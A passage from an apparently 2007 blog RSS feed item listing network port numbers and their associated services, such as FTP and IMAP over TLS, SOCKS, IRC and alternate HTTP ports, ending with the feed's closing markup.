FTP Protocol, Data, Over TLS/SSL&lt;br /&gt;990 ........................ FTP Protocol, Control, Over TLS/SSL&lt;br /&gt;992 ........................ Telnet Protocol Over TLS/SSL&lt;br /&gt;993 ........................ IMAP4 Protocol Over TLS/SSL&lt;br /&gt;994 ............................ IRC Protocol Over TLS/SSL&lt;br /&gt;995 ........................ POP3 Protocol Over TLS/SSL&lt;br /&gt;1036 ...................... RADAR Service Protocol&lt;br /&gt;1052 ...................... Dynamic DNS Tools (DDT)&lt;br /&gt;1053 ...................... Remote Assistant&lt;br /&gt;1080 .......................... SOCKS&lt;br /&gt;1110 ...................... Cluster Status Info&lt;br /&gt;1112 ...................... Intelligent Communication Protocol&lt;br /&gt;1278 – 1279 .............. DELL Web Admin&lt;br /&gt;1296 ...................... Dproxy&lt;br /&gt;1297 ...................... SDProxy&lt;br /&gt;1333 ...................... Password Policy&lt;br /&gt;1336 ...................... Instant Service Chat&lt;br /&gt;1393 ...................... Network Log Server&lt;br /&gt;1394 ...................... Network Log Client&lt;br /&gt;2303 ...................... Proxy Gateway&lt;br /&gt;2311 ...................... Message Service&lt;br /&gt;2450 ...................... Netadmin&lt;br /&gt;2451 ...................... Netchat&lt;br /&gt;2452 ...................... Snifferclient&lt;br /&gt;2533 ...................... SnifferServer&lt;br /&gt;2784 ...................... Word Wide Web – Development&lt;br /&gt;2860 – 2861 .............. Dialpad Voice 1 – 2&lt;br /&gt;2987 ...................... Indentify&lt;br /&gt;5600 ...................... Enterprise Security Manager&lt;br /&gt;5601 ...................... Enterprise Security Agent&lt;br /&gt;6665 – 6669 .......... IRCU&lt;br /&gt;7777 ...................... CBT&lt;br /&gt;7779 ...................... VSTAT&lt;br /&gt;8008 ...................... HTTP Alternate&lt;br /&gt;8080 ...................... HTTP Alternate&lt;br /&gt;49151 .................... IANA Reserved</description><link>http://xpemula.blogspot.com/2007/11/port-number.html</link><author>noreply@blogger.com (BlackSignal)</author><thr:total>0</thr:total></item></channel></rss>